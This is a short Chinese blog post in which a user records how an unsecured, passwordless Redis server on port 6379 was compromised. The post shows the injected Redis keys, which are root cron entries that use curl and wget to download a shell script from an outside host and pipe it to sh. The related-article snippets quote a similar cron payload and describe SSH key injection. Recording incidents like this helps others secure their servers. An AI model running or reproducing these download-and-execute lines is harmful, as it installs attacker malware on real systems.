Redis 6379 被攻击

最新推荐文章于 2024-04-20 11:20:29 发布
最新推荐文章于 2024-04-20 11:20:29 发布
阅读量2.1k 收藏 3
点赞数 1
分类专栏: 笔记 文章标签: 安全 redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40738712/article/details/114966770
版权

Redis 6379 被攻击

刚开始使用redis,把端口打开了,然后没有设置密码,导致被恶意攻击,这里记录一下。

[root@realguo ~]# redis-cli
127.0.0.1:6379> keys *
1) "backup2"
2) "backup1"
3) "backup4"
4) "backup3"

127.0.0.1:6379> get backup1
"\n\n\n*/2 * * * * root cd1 -fsSL http://zzhreceive.anondns.net/b2f628/b.sh | sh\n\n"
127.0.0.1:6379> get backup2
"\n\n\n*/3 * * * * root wget -q -O- http://zzhreceive.anondns.net/b2f628/b.sh | sh\n\n"
127.0.0.1:6379> get backup3
"\n\n\n*/4 * * * * root curl -fsSL http://zzhreceive.anondns.net/b2f628fff19fda999999999/b.sh | sh\n\n"
127.0.0.1:6379> get backup4
"\n\n\n*/5 * * * * root wd1 -q -O- http://zzhreceive.anondns.net/b2f628fff19fda999999999/b.sh | sh\n\n"

在这里插入图片描述

第一次被攻击,还有些新鲜感,哈哈。

但是安全还是很重要的,下次不敢不设置密码了

RealGUO
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
一次Linux中的木马病毒解决经历(6379端口---newinit.sh)
weixin_54626591的博客
08-17 665
一次Linux中的木马病毒解决经历(6379端口---newinit.sh)
redis受到攻击
weixin_40083227的博客
05-03 418
今天被挖矿软件不小心植入脚本了,导致云服务器100%的CPU占用,被迫当肉鸡。原因是redis的默认端口没有改,也没有密码,就被攻击。 解决方法是 sudo kill -9 10053 && sudo userdel redis 必须要同时执行,这个脚本会自动唤醒,删除redis用户后,找到异常的脚本文件删除掉。然后卸载redis,sudo apt remove redis ...
redis攻击笔记
半僧
12-31 3517
公司redis集群不断丢失数据,莫名进程不断涌起。经过几天排查,锁定redis攻击。很多使用者都是把redis下载到服务器直接运行使用,无ACL,无密码,root运行,且绑定在0.0.0.0:6379,暴露在公网。攻击者在未授权访问 Redis 的情况下通过redis的机制,可以将自己的公钥或者其他恶意程序写入目标服务器中,从而可以直接控制目标服务器。 下面还原攻击情况:寻找无验证的redis
为什么redis的端口号是6379
最新发布
长风破浪会有时的博客
04-20 249
你知道电脑上的应用程序是怎么互相说话的吗?每个应用程序都有一个或多个端口,就像我们每个人都有一个电话号码一样。当其他应用程序想要和Redis说话时,它们就会拨打6379这个“电话号码”。Redis的创造者选择6379作为Redis的端口号,可能是因为这个数字看起来比较顺眼,容易记住,而且没有被其他常用的应用程序占用。这样,当Redis在电脑上运行时,它就可以顺利地通过6379这个端口号和其他应用程序交流了。其实,这个数字并没有特别的魔法,它只是一个被Redis的创造者选定的数字。
血的教训---入侵redis并远程控制你的机器场景复现
guijianchouxyz的博客
10-26 6887
不怕服务安装部署,就怕上任运维瞎部署防不胜防,全是泪,全是血
Redis攻击Redis安全性)
Beyonderwei的博客
10-28 2126
文章目录一、简介二、设置密码 一、简介     默认Redis没有开启密码,因此需要我们进入后设置。如果没有设置密码就很容易会被攻击到,导致数据丢失,被植入其他内容。被攻击后写入了一些其他内容如下: 查询一下某一个键的内容为如下形式:(不是很懂,应该被植入了一些脚本文件) "\t\n*/20 * * * * curl -fsSL http://d.powerofwish.com/pm.sh | sh\n\t" 二、设置密码 常用命令: config get requirepass # 查询获
redis攻击还原
10-05
此文档说明了redis攻击的原理以及预防的措施 简单来说就是不要用root运行 可以设置密码 可以设置防火墙规则固定ip访问相关端口
使用Redis存放Session RedisManager
05-14
确保Redis配置安全,例如限制网络访问,启用身份验证,以及使用安全的序列化方式防止反序列化攻击。 10. **扩展性** RedisManager的设计应该易于扩展,适应未来可能的负载均衡和集群环境。例如,如果应用扩展到多...
redis-6.2.5.rar
08-19
Redis是一款高性能的键值对数据存储系统,常被用作数据库、缓存和消息中间件。标题中的"redis-6.2.5.rar"表明这是一个包含Redis 6.2.5稳定版的压缩包,适用于Windows操作系统。这个版本是Redis官方发布的最新版本,...
redis-6.2.13.tar.gz
09-26
可以通过`rename-command`更改敏感命令名称,防止误操作或攻击。还可以设置密码保护,限制客户端连接。 10. **模块系统**: Redis 6.2.13引入了模块系统,允许扩展其功能,如GEO索引、TTL监控等。 11. **性能...
redis权限webshell1
08-08
Redis 权限 webshell1 Redis 是一个开源的内存数据结构存储,用于database、缓存、消息队列等...`nmap -p6379 10.11.0/16 --script redis-info` 通过这种方式,可以保护 Redis 服务器免受攻击,保障企业的数据安全
Redis攻击纪实
程序员青菜学厨记
11-08 439
1、2017年时候测试环境安装的是Redis4.0版本(或者更低,记不太清了),默认安装6379端口可以远程访问,然后被黑了,被人家做为挖矿机,他们太狠了,一定要把我CPU耗尽,搞得别的程序都跑不了(这样别人不就发现了吗,不能控制CPU的占用情况吗?上周新来的同事分享Redis的原理和机制,想起2017年的时候测试环境Redis攻击,最后只能重新安装服务器,今天试验一把利用Redis漏洞进行攻击,只有理解了别人是怎么攻击的,才能更好地进行防范。注:忘记截屏了,重启了Redis,那个注入的key找不到了。
记录一下reids连接超时,无法访问6379端口的问题
fanzc94的博客
04-07 2269
1、需要考虑到Redis配置本身是否支持远程外网访问,在redis的配置文件中找到bind参数,如果bind参数配置为127.0.0.1则不允许外网访问,此时我们需要改变它的配置,将bind参数注释掉,或者是修改为0.0.0.0,或者是相应的外网ip 地址,然后保存配置。其实redis无法连接数据库就只有这几种可能,防火墙,安全组,密码,绑定IP。百度了大多数的答案说的都是修改ip,开放端口之后问题就解决了,因为我是一步一步操作下来的,所以这些配置极其确定是没有问题的,而且都是反复查看过的。
记一次阿里云服务器因Redis被【挖矿病毒crypto和pnscan】攻击的case,附带解决方案
ZL_1618的博客
12-27 1173
因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)①1000+CTF历届题库(主流和经典的应该都有了)③项目源码(四五十个有趣且经典的练手项目及源码)⑦ 2023密码学/隐身术/PWN技术手册大全。⑤ 网络安全学习路线图(告别不入流的学习)⑥ CTF/渗透测试工具镜像文件大全。②CTF技术文档(最全中文版)
解决腾讯云服务器存在端口(6379)对外攻击行为
m0_53078233的博客
04-13 7809
解决腾讯云服务器存在端口(6379)对外攻击行为
未授权访问漏洞-Redis未授权访问漏洞
HAKUNAMATATATTA的博客
11-29 3362
未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导 致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。Redis 是完全开源免费的,一个灵活的高性能 key-value 数据结构存储,可以用来作为数据库、缓存和消息队列。
redis 安全漏洞导致服务器被攻击
Golden_lion的博客
03-01 3883
近日发现redis数据无故被清,恢复后连续几次还是被清,由于经验不足,一直认为是自己配置有误。经过多天查找,才发现2015年11月份爆发了redis安全漏洞攻击事件,一一印证了下,全部中招。 特点: 1.redis缓存被清0;而且每天会执行一次; 2./root/.ssh/ 下多了几个文件。dump.rdb, foo.txt, authorized_keys里多了莫名
记一次Redis数据库漏洞被入侵现象
java、c++、机器学习方向King
03-21 6458
服务器状态:为了便于研发,把公司购买的云服务器上的一台内网服务器,主要目的是,把开放服务器上的Redis数据库服务,便于相关研发人员调用使用。出现的现象问题:CPU基本满负荷(估计是被当做肉鸡),出现SSH登录不上服务器的情况。挂了电话后我就登上了阿里云账号,看了一下自己Mem和CPU的使用状况,Mem倒没撒,CPU确实一直是一条直线,一直是百分之百。后来我就看了ps -aux看了进程cpu和内存...
安装redis后,系统异常,被黑客攻击入侵
BecauseOfYouIKnew的博客
03-22 2729
如果你的系统在安装redis后,同时在使用默认redis配置文件的情况下,系统发生异常,那你就应该去查看你的/root/.ssh/authorized_keys的文件,如果出现类似代码:说明你的系统被黑客通过redis入侵了,`REDIS0006þ^@^@^GcrackitA<90>ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDao4L1Hk/El05qbO5NeBA
redis 缓存被清空怎么排查
03-24
Redis 缓存被清空时,可以按照以下步骤进行排查: 1. 检查 Redis 日志,查看是否有异常信息或错误日志; 2. 检查 Redis 配置文件,确认是否有设置过期时间或清空缓存的定时任务; 3. 检查 Redis 客户端,确认...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值